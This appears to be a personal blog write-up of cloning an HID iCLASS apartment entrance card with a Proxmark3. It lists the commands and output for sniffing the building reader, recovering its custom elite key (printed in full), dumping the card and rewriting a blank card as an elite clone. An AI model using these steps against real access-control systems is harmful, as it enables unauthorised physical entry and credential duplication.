Clone my apartment entrance card

The management office of my apartment gives me 5 cards, looks like

Card, labeled HID / iCLASS

Since management office does not issue additional cards I wanted to try cloning by myself with my Proxmark3.

First try, get the info from existing cards

connect pm3 to laptop, put one card on the HF antenna and run
hf search
pm3 can detects this a HID iCLASS/PicoPass card and the command
hf ic info
can returns some basic card information, including the CSN

However, running the command hf ic chk -f iclass_default_keys.dic
returns nothing :

[+] loaded 11 keys from dictionary file C:\Working\ProxSpace\pm3\proxmark3\client\dictionaries/iclass_default_keys.dic
[+] Reading tag CSN / CCNR...
[+]     CSN: 02 15 9F 00 F8 FF 12 E0
[+]    CCNR: FC E1 FF FF FF FF FF FF 00 00 00 00
[=] Generating diversified keys
[+] Searching for DEBIT key...
[/]Chunk [000/11]
[+] time in iclass chk 2.3 seconds

which means all default key does not work. This is a dead end.

Second Try, use pm3 to run a online sniff

Connect pm3 to laptop, and run the command
hf iclass sim 2
Then take the laptop with the pm3 (Keep the usb cable connected!) to the entrance of the building. Place the pm3 HF antenna near the card reader.

This time PM3 logs some data are saved as iclass_mac_attack.bin.

With this file, run command hf iclass loclass -f iclass_mac_attack.bin
. After a few seconds PM3 should report the KEY it restore:

High security custom key (Kcus):
Std format    = 8fa250c3cb61f41c
Iclass format = 5b7c62c491c11b39
Key verified ok!

OK, we have moved one step forward. Lets play with this key restored.

Third try, read card data with the key

The key restored from previous step is 5b7c62c491c11b39 so I tried to dump data from this key:

pm3 --> hf ic dump --key 5b7c62c491c11b39

Failed to communicate with card

Same error for the other key 8fa250c3cb61f41c.

Then I tried with --elite parameter:

pm3 --> hf ic dump --key 5b7c62c491c11b39 --elite

Oh! This time PM3 reads the data out

[usb] pm3 --> hf ic dump --key 5b7c62c491c11b39 --elite
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
.

[=] --------------------------- Tag memory ----------------------------

[=]  block#  | data                    | ascii    |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=]   0/0x00 | 02 15 9F 00 F8 FF 12 E0 | .F...... |   | CSN
     
     ------- block 0x01 to 0x18 omitted
 
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential

[+] saving dump file - 19 blocks read
[+] saved 152 bytes to binary file hf-iclass-02159F00F8FF12E0-dump.bin
[+] saved 19 blocks to text file hf-iclass-02159F00F8FF12E0-dump.eml
[+] saved to json file hf-iclass-02159F00F8FF12E0-dump.json
[?] Try `hf iclass decrypt -f` to decrypt dump file
[?] Try `hf iclass view -f` to view dump file

As all the data is dumped, a big step moved on.

Fourth try, write the dumped data to a new card

Put the newly brought HID iClass card on PM3. Run the command

pm3 --> hf ic chk -f iclass_default_keys.dic

This time the default key AEA684A6DAB23278 is reported working.

And write the dumps from previous step to this card:

pm3 --> hf iclass restore -f hf-iclass-02159F00F8FF12E0-dump.json --first 6
        --last 18 --ki 0

done. So now I have got a new card, with data restored from the dumped files.

Will it work ? Tried at the card reader. No luck.

Think it carefully. Now we have 2 cards:

1. Original card; need to be read data with --elite argument with the sniffed key;
2. Cloned card; need to be read data without --elite argument with the default key

Hmm.. Seems quite different. That’s why the cloned card cannot be used.

Fifth Try, Updated the cloned card to ELITE

Since the original card is an ELITE card (read with --elite ) then if we can upgrade the cloned card to ELTE also ?

Run the following command on the cloned card with PM3

[usb] pm3 --> hf iclass calcnewkey --oki 0 --new 5b7c62c491c11b39 --elite
[+] Using old key[0]... AE A6 84 A6 DA B2 32 78
[+] CSN     02 15 9F 00 F8 FF 12 E0
[+] epurse  FE FF FF FF FF FF FF FF
[+] Old div key......... 12 4F 36 D4 96 2F 1E 33
[+] New div key......... D9 A3 01 95 9E AD DF 44
[+] Xor div key......... 5C 2F 43 71 B6 D6 A6 A3

And write the KEY calculated (Xor div key) to the card block 3:

[usb] pm3 --> hf ic wrbl -b 3 -d 5C2F4371B6D6A6A3  --ki 0

Now the card was updated to ELITE format.

Verify: Read command will fail, as the card has been upgraded to ELITE

pm3 --> hf ic rdbl -b 4 --ki 0

Read with elite will success:

pm3 --> hf ic rdbl -b 4 --key 5b7c62c491c11b39 --elite

Dump with ELITE should success

pm3 --> hf ic dump --key 5b7c62c491c11b39 --elite

So now we have 2 elite cards. One is original the other is the cloned.

Make sure BOTH as the same data from block 3 to block 18 .

If not, copy the data from original and write to the cloned card, for example

pm3 --> hf ic wrbl -b 5 -d 1122334455667788 --key 5b7c62c491c11b39 --elite

( 1122334455667788 is copied from original card dump, on block 5 )

And now we have 2 cards:
1. Both ELITE ;
2. All data section is same;
3. Can be read with the same ELITE key;

The only difference is the CSN; which means if there are some checksums from the CSN to the data then our cloned card will not work.

But lets try….

Take the cloned card to the reader and scan it…

Ohh!! it works!!

It looks like the card reader

1. Only read the card with the ELITE key;
2. Verify certain data in user data section;
3. No checksums on CSN / Data.